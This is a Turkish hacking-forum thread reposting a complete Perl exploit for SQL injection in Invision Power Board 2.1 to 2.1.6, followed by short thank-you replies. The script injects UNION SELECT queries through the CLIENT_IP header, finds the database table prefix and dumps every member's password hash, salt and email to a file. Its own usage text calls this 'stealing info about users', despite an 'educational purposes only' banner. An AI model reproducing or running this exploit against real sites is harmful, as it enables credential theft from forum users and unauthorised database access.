Invision Power Board 2.1 = 2.1.6 Remote - Turkish Hacking Sabotage | Türkiyenin En Büyük Hack Ve Security Sitesi

Vasili81 · **Invision Power Board 2.1 = 2.1.6 Remote -** 05-12-2007

Invision Power Board 2.1 <= 2.1.6 Remote SQL Injection Exploit

Tarih: 2006-07-18

Açığı bulan: w4g.not null

Exploit:

Kod:

#!/usr/bin/perluse LWP::UserAgent; $ua = LWP::UserAgent->new; &header();if (@ARGV < 2) {&info(); exit();}$server = $ARGV[0];$dir = $ARGV[1];print "[+] SERVER {$server}\r\n";print "[+] DIR {$dir}\r\n";#Step 1, detecting vulnerabilityprint "[1] Testing forum vulnerability...";$q = "UNION SELECT 'VULN',1,1,1/*";query($q,$server,$dir);if($rep =~/VULN/){ print "forum vulnerable\r\n"; }else     {     print "forum unvulnerable\r\n";	 &footer();     exit();    }#Step 2, detecting prefixprint "[2] Searching prefix...";$q = "";query($q,$server,$dir);$prefix = $rep;print $prefix."\r\n";#Step 3, make queryprint "[3] Performing query; it may take several minutes, plz, wait...\r\n";$q1 = "UNION SELECT MAX(converge_id),1,1,1 FROM ".$prefix."members_converge/*";query($q1,$server,$dir);$kol = $rep;open(RES,">".$server."_result.txt");for($id = 1; $id <= $kol; $id++)    {	 $own_query = "UNION SELECT converge_pass_hash,1,1,1 FROM ".$prefix."members_converge WHERE converge_id=".$id."/*";     query($own_query,$server,$dir);     if($rep=~/[0-9a-f]{32}/i) 	    {	     $hash = $rep;		 $own_query = "UNION SELECT converge_pass_salt,1,1,1 FROM ".$prefix."members_converge WHERE converge_id=".$id."/*";         query($own_query,$server,$dir);         if(length($rep)==5) 		    {			 $salt = $rep;			 $own_query = "UNION SELECT converge_email,1,1,1 FROM ".$prefix."members_converge WHERE converge_id=".$id."/*";             query($own_query,$server,$dir);			 if(length($rep)>0)			    {				 $email = $rep;				 print RES $id.":".$hash.":".$salt."::".$email."\n";			    }			}		 		}    }close(RES);print "[!] Query was successfully perfomed. Results are in txt files\r\n";&footer();$ex = <STDIN>;sub footer()    {     print "[G] Greets: 1dt.w0lf (rst/ghc)\r\n";     print "[L] Visit: secbun.info | damagelab.org | rst.void.ru\r\n";    }sub header(){print q(----------------------------------------------------------* Invision Power Board 2.1.* Remote SQL Injecton Exploit **       Based on r57-Advisory#41 by 1dt.w0lf (rst/ghc)   **                Coded by w4g.not null                   **              FOR EDUCATIONAL PURPOSES *ONLY*           *----------------------------------------------------------);}sub info(){ print q([i] Usage: perl w4gipb216.pl [server] [/dir/]     where	   |- server - server, where IPB installed without http://	   |- /dir/ - dir, where IPB installed or / for no dir	 e.g perl w4gipb216.pl someserver.com /forum/[i] Stealing info about users (format id:pass:salt::email)	  [!] Need MySQL > 4.0  );}sub query()    {     my($q,$server,$dir) = @_;     $res = $ua->get("http://".$server.$dir."index.php?s=w00t",'USER_AGENT'=>'','CLIENT_IP'=>"' ".$q);      if($res->is_success)        {         $rep = '';         if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; }         else   		    {             if($res->as_string =~ /FROM (.*)sessions/) { $rep = $1; }            }        }     return $rep;    }

MÜŞFİCK · **Cevap: Invision Power Board 2.1 = 2.1.6 Remote -** 05-19-2007

Evet eskimiş bu ama emeğe saygı...

**Slytherin** · 01:26 AM

Sagol Paylasım icin..

system mAn1Ac · 07-19-2008

teşekkürler ama çoooooook eskı!

BENUMBE · 07-19-2008

emege saygi.. rep

MHACK · 07-20-2008

Paylaşım için saol kardeşş

Konu Bilgileri
	Konu Başlığı Invision Power Board 2.1 = 2.1.6 Remote	Konudaki Cevap Sayısı 5
	Şuan Bu Konuyu Görüntüleyenler	Görüntülenme Sayısı 369

Seçenekler
Yazdırılabilir şekli göster Sayfayı E-Mail olarak gönder
Stil
Normal Hybrid-Şeklinde gösterime geç Ağaç şeklinde gösterime geç

Konuyu Toplam 1 Üye okuyor. (0 Kayıtlı üye ve 1 Misafir)